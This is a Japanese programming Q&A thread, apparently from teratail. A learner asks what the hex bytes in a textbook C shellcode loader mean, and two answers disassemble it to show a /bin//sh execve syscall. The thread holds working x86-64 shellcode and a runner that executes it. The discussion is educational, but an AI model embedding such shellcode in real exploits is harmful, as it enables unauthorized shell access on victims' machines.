質問をすることでしか得られない、回答やアドバイスがある。

15分調べてもわからないことは、質問しよう!

新規登録して質問してみよう
ただいま回答率
85.35%
C

C言語は、1972年にAT&Tベル研究所の、デニス・リッチーが主体となって作成したプログラミング言語です。 B言語の後継言語として開発されたことからC言語と命名。そのため、表記法などはB言語やALGOLに近いとされています。 Cの拡張版であるC++言語とともに、現在世界中でもっとも普及されているプログラミング言語です。

セキュリティー

このタグは、コンピューターシステムの安全性やデータの機密性に関連したトピックの為に使われます。

Q&A

解決済

2回答

1219閲覧

シェルコード の16進数について

退会済みユーザー

退会済みユーザー

総合スコア0

C

C言語は、1972年にAT&Tベル研究所の、デニス・リッチーが主体となって作成したプログラミング言語です。 B言語の後継言語として開発されたことからC言語と命名。そのため、表記法などはB言語やALGOLに近いとされています。 Cの拡張版であるC++言語とともに、現在世界中でもっとも普及されているプログラミング言語です。

セキュリティー

このタグは、コンピューターシステムの安全性やデータの機密性に関連したトピックの為に使われます。

0グッド

1クリップ

投稿2020/11/26 12:51

コンピュータハイジャッキングという本でシェルコードについて勉強しているのですが、注入するプログラムの意味がわかりません。
例えば次のコード

#include <stdio.h> #include <string.h> char *shellcode = "\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68" "\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x48\x8d\x42\x3b\x0f\x05"; int main(void) { fprintf(stdout,"Length: %d\n",strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; }

変数 *shellcode を使って標的ホストでシェルを起動させるコードなのですが、実行はできたのですが、shellcodeに格納している16進数の意味がわかりません。
試しに"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68"を翻訳させてみると
H1ÒRH¸/bin//sh
と出てきました。/bin//shは分かるのですが、左の5文字の意味は何なのでしょうか?
他のコードでも翻訳すると意味がわからない文字列ばかりで、何をやっているのかわかりません。
これは適当な数字や文字を入れてるだけなのでしょうか?

気になる質問をクリップする

クリップした質問は、後からいつでもMYページで確認できます。

またクリップした質問に回答があった際、通知やメールを受け取ることができます。

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

otn

2020/11/26 13:14

そのあたりを勉強するのが「コンピュータハイジャッキングという本」でなのでは? 絶対本に書いてあるはず。
fumu7

2020/11/26 13:17

何をやっているかって、”コンピュータハイジャッキング”という犯罪への準備です! ここは、犯罪者を援助するためのサイトではありません! 判らないうちに、辞めておくべきです。
guest

回答2

0

ベストアンサー

シェルコードを逆アセンブルしてみます。

$ objdump -D -b binary -M intel,x86-64 -m i386 a.out a.out: ファイル形式 binary セクション .data の逆アセンブル: 00000000 <.data>: 0: 48 31 d2 xor rdx,rdx 3: 52 push rdx 4: 48 b8 2f 62 69 6e 2f movabs rax,0x68732f2f6e69622f b: 2f 73 68 e: 50 push rax f: 48 89 e7 mov rdi,rsp 12: 52 push rdx 13: 57 push rdi 14: 48 89 e6 mov rsi,rsp 17: 48 8d 42 3b lea rax,[rdx+0x3b] 1b: 0f 05 syscall

これを説明している記事を探してみましたら、以下が見つかりました。

x64でスタックバッファオーバーフローをやってみる - ももいろテクノロジー

コンピュータハイジャッキングには上記のような説明はなかったでしょうか?

投稿2020/11/26 13:52

ockeghem

総合スコア11705

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

0

text

1 0: 48 31 d2 xor %rdx,%rdx 2 3: 52 push %rdx 3 4: 48 b8 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rax 4 b: 2f 73 68 5 e: 50 push %rax 6 f: 48 89 e7 mov %rsp,%rdi 7 12: 52 push %rdx 8 13: 57 push %rdi 9 14: 48 89 e6 mov %rsp,%rsi 10 17: 8d 42 3b lea 0x3b(%rdx),%eax 11 1a: 0f 05 syscall

59(0x3b) の syscall は execve です。
参考になりますか?

投稿2020/11/26 13:32

編集2020/11/26 13:45
kazuma-s

総合スコア8224

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

あなたの回答

tips

太字

斜体

打ち消し線

見出し

引用テキストの挿入

コードの挿入

リンクの挿入

リストの挿入

番号リストの挿入

表の挿入

水平線の挿入

プレビュー

15分調べてもわからないことは
teratailで質問しよう!

ただいまの回答率
85.35%

質問をまとめることで
思考を整理して素早く解決

テンプレート機能で
簡単に質問をまとめる

質問する

関連した質問